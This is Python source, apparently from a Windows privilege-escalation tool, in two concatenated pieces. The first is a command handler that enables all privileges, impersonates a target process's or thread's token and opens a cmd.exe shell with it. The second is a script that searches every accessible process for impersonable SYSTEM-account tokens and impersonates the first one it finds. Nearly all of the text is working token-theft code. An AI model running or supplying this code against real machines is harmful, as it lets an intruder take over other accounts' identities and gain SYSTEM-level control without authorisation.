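def imptoken(args):
    """Impersonate the token of a process (or of one of its threads) and try to open a shell with it.

    Args:
        args: dict of parsed command-line options. Reads ``args['pid']``
            (required; the target process id) and ``args['ihandle']``
            (thread handle to impersonate; when None the process's primary
            token is used instead).

    Returns:
        None. Failures are reported through ``logging.error`` and the
        function returns early; nothing is raised by this function itself.
    """
    pid = args['pid']
    if pid is None:
        logging.error("A pid has to be selected")
        return

    # 'ihandle' is only consulted once a pid is present, as in the original flow.
    iHandle = args['ihandle']
    if iHandle is None:
        printT("Impersonating primary token of pid {0}".format(pid))
    else:
        printT("Impersonating token of the thread ihandle {0} of pid {1}".format(iHandle, pid))

    imp = Impersonate()
    imp.enableAllUserRights()
    status = imp.impersonateThisToken(pid=pid, iHandle=iHandle)
    # NOTE(review): impersonateThisToken is assumed to return a bool (the
    # original compared it with == True) — confirm against Impersonate.
    if not status:
        logging.error("Impossible to impersonate")
        return

    printT("Trying to open a cmd shell...")
    printT(
        "NOTICE: If not enough privileges for targeted pid, you can't open a cmd.exe shell"
    )
    imp.printCurrentThreadEffectiveToken()
    # Rights are enabled a second time here, now on the impersonated thread
    # token; this repeats the original sequence of calls on purpose.
    imp.enableAllUserRights()
    imp.executeCMDWithThreadEffectiveToken()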
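import sys

sys.path.append('../')

from impersonate import Impersonate
from utils import *
from windef import TokenImpersonation

configureLogging()
imp = Impersonate()

# Collect impersonation-type tokens that can be impersonated and that belong
# to the SYSTEM account (SID S-1-5-18), across every accessible process.
allTokens = imp.getTokensAccessibleFilter(
    targetPID=None,
    filter={
        'canimpersonate': True,
        'sid': 'S-1-5-18',
        'type': TokenImpersonation,
    },
    _useThreadMethod=False,
)

# The original code treated both an empty dict and None as "nothing found";
# a falsiness check covers both.
if not allTokens:
    print("No one token found for impersonation")
else:
    # Use the first token of the first pid returned in 'allTokens'.
    pid = next(iter(allTokens))
    firstIHandle = allTokens[pid][0]['ihandle']
    imp.printThisToken(allTokens, pid, firstIHandle)
    imp.impersonateThisToken(pid=pid, iHandle=firstIHandle)
    print("Current Effective token for current thread after impersonation:")
    imp.printCurrentThreadEffectiveToken(printFull=False, printLinked=False)
    # Revert to the thread's own token so the process does not keep running
    # under the borrowed identity once the demonstration is over.
    imp.terminateImpersonation()
    print(
        "Current Effective token for current thread (impersonation finished):")
    imp.printCurrentThreadEffectiveToken(printFull=False, printLinked=False)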